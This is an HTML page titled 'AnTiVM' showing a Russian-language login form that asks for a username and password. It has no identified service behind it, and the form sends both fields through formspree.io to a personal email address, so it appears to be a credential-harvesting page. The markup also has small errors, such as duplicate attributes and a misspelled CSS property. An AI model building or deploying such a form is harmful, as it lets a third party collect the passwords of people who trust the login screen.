<html>
	<head>
		<title>AnTiVM</title>
		<meta charset = "utf-8">
		<link rel="stylesheet" href = "site.css">
	</head>
	<body background = "untitled123123123123.png" style="background-attachment:fixed" topmargin="0">
		<center><br><br><form action="https://formspree.io/abonesoft@ukr.net" method = "POST">
		<input class = "of1" name = "what1" type = "text" name = "pib" placeholder = "Введите имя пользователя:" title = "¬ведите им¤:" required/>
		<br><br><input class = "of1" name = "what2" type = "password" name = "tel" placeholder = "Введите пароль:" title = "введите пароль:" required/>
		<br><br><input src = "nazik_6.github.io" class = "of2" type = "submit" value = "Войти"/>
		</form></center>
		<style>
			body{
	font-family: Whirl Cyrillic;
    background: url(kkk1.jpg) no-repeat;
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover;
}
.of1{
	height: 50px;
	width: 350px;
	font-size: 20px;
	boreder-radius: 4px;
}
.of2{
	height: 40px;
	width: 300px;
	font-size: 25px;
}
h1{
	font-size: 100px;
}

.kkkk{
	height: 65px;
	width: 70px;
}
p{
	font-size: 80px;
	color: white;
}
.gradient{
	color: black;
	background: url(kkk.jpg) no-repeat;
	-webkit-background-clip: text;
	-webkit-text-fill-color: transparent;
	animation-name: gradient;
	animation-duration: 2s;
	animation-iteration-count: infinite;
}
@keyframes gradient{
	0%{
		background-position: 0 0;
	}
	50%{
		background-position: 100% 0;
	}
	100%{
		background-position: 0 0;
	}
}
		</style>
	<body>
</html>
